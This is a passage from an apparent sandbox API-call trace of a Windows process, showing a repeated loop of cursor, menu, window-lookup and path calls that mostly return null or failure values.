wParam=0xffff, lParam=0x0) returned 0x0 [0027.389] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.389] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.389] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.390] GetStockObject (i=6) returned 0x1b00018 [0027.390] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.390] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.390] PathFileExistsW (pszPath=0x0) returned 0 [0027.390] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.390] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.390] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.390] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.390] GetMenu (hWnd=0x0) returned 0x0 [0027.390] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.390] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.390] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.390] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.390] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.390] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.390] GetStockObject (i=6) returned 0x1b00018 [0027.390] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.390] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.390] PathFileExistsW (pszPath=0x0) returned 0 [0027.390] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.390] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.390] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.390] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.390] GetMenu (hWnd=0x0) returned 0x0 [0027.390] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.390] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.391] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.391] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.391] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.391] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.391] GetStockObject (i=6) returned 0x1b00018 [0027.391] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.391] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.391] PathFileExistsW (pszPath=0x0) returned 0 [0027.391] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.391] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.391] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.391] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.391] GetMenu (hWnd=0x0) returned 0x0 [0027.391] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.391] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.391] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.391] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.391] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.391] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.391] GetStockObject (i=6) returned 0x1b00018 [0027.391] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.391] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.391] PathFileExistsW (pszPath=0x0) returned 0 [0027.391] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.391] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.391] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.391] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.392] GetMenu (hWnd=0x0) returned 0x0 [0027.392] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.392] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.392] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.392] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.392] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.392] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.392] GetStockObject (i=6) returned 0x1b00018 [0027.392] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.392] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.392] PathFileExistsW (pszPath=0x0) returned 0 [0027.392] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.392] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.392] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.392] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.392] GetMenu (hWnd=0x0) returned 0x0 [0027.392] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x259) returned -1 [0027.392] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.392] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.392] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.392] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.392] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.392] GetStockObject (i=6) returned 0x1b00018 [0027.392] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.392] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.392] PathFileExistsW (pszPath=0x0) returned 0 [0027.392] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.393] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.393] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.393] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.393] GetMenu (hWnd=0x0) returned 0x0 [0027.393] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.393] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.393] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.393] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.393] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.393] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.393] GetStockObject (i=6) returned 0x1b00018 [0027.393] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.393] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.393] PathFileExistsW (pszPath=0x0) returned 0 [0027.393] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.393] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.393] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.393] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.393] GetMenu (hWnd=0x0) returned 0x0 [0027.393] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.393] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.393] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.393] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.393] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.393] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.393] GetStockObject (i=6) returned 0x1b00018 [0027.394] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.394] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.394] PathFileExistsW (pszPath=0x0) returned 0 [0027.394] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.394] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.394] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.394] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.394] GetMenu (hWnd=0x0) returned 0x0 [0027.394] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.394] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.394] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.394] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.394] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.394] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.394] GetStockObject (i=6) returned 0x1b00018 [0027.394] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.394] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.394] PathFileExistsW (pszPath=0x0) returned 0 [0027.394] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.394] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.394] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.394] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.394] GetMenu (hWnd=0x0) returned 0x0 [0027.394] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.394] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.394] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.394] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.394] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.395] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.395] GetStockObject (i=6) returned 0x1b00018 [0027.395] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.395] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.395] PathFileExistsW (pszPath=0x0) returned 0 [0027.395] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.395] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.395] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.395] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.395] GetMenu (hWnd=0x0) returned 0x0 [0027.395] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x464) returned -1 [0027.395] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.395] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.395] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.395] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.395] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.395] GetStockObject (i=6) returned 0x1b00018 [0027.395] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.395] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.395] PathFileExistsW (pszPath=0x0) returned 0 [0027.395] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.395] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.395] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.395] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.395] GetMenu (hWnd=0x0) returned 0x0 [0027.395] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.395] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.396] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.396] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.396] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.396] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.396] GetStockObject (i=6) returned 0x1b00018 [0027.396] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.396] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.396] PathFileExistsW (pszPath=0x0) returned 0 [0027.396] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.396] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.396] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.396] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.396] GetMenu (hWnd=0x0) returned 0x0 [0027.396] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.396] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.396] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.396] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.396] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.396] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.396] GetStockObject (i=6) returned 0x1b00018 [0027.396] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.396] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.396] PathFileExistsW (pszPath=0x0) returned 0 [0027.396] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.396] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.396] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.397] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.397] GetMenu (hWnd=0x0) returned 0x0 [0027.397] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.397] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.397] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.397] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.397] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.397] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.397] GetStockObject (i=6) returned 0x1b00018 [0027.397] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.397] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.397] PathFileExistsW (pszPath=0x0) returned 0 [0027.397] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.397] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.397] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.397] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.397] GetMenu (hWnd=0x0) returned 0x0 [0027.397] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.397] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.397] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.397] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.397] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.397] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.397] GetStockObject (i=6) returned 0x1b00018 [0027.397] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.397] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.397] PathFileExistsW (pszPath=0x0) returned 0 [0027.398] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.398] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.398] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.398] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.398] GetMenu (hWnd=0x0) returned 0x0 [0027.398] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x476) returned -1 [0027.398] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.398] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.398] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.398] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.398] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.398] GetStockObject (i=6) returned 0x1b00018 [0027.398] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.398] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.398] PathFileExistsW (pszPath=0x0) returned 0 [0027.398] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.398] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.398] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.398] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.398] GetMenu (hWnd=0x0) returned 0x0 [0027.398] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.398] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.398] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.398] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.398] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.398] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.398] GetStockObject (i=6) returned 0x1b00018 [0027.398] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.399] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.399] PathFileExistsW (pszPath=0x0) returned 0 [0027.399] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.399] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.399] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.399] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.399] GetMenu (hWnd=0x0) returned 0x0 [0027.399] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.399] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.399] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.399] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.399] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.399] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.399] GetStockObject (i=6) returned 0x1b00018 [0027.399] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.399] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.399] PathFileExistsW (pszPath=0x0) returned 0 [0027.399] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.399] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.399] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.399] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.399] GetMenu (hWnd=0x0) returned 0x0 [0027.399] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.399] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.399] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.399] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.399] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.400] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.400] GetStockObject (i=6) returned 0x1b00018 [0027.400] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.400] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.400] PathFileExistsW (pszPath=0x0) returned 0 [0027.400] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.400] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.400] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.400] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.400] GetMenu (hWnd=0x0) returned 0x0 [0027.400] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.400] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.400] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.400] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.400] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.400] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.400] GetStockObject (i=6) returned 0x1b00018 [0027.400] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.400] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.400] PathFileExistsW (pszPath=0x0) returned 0 [0027.400] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.400] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.400] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.400] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.400] 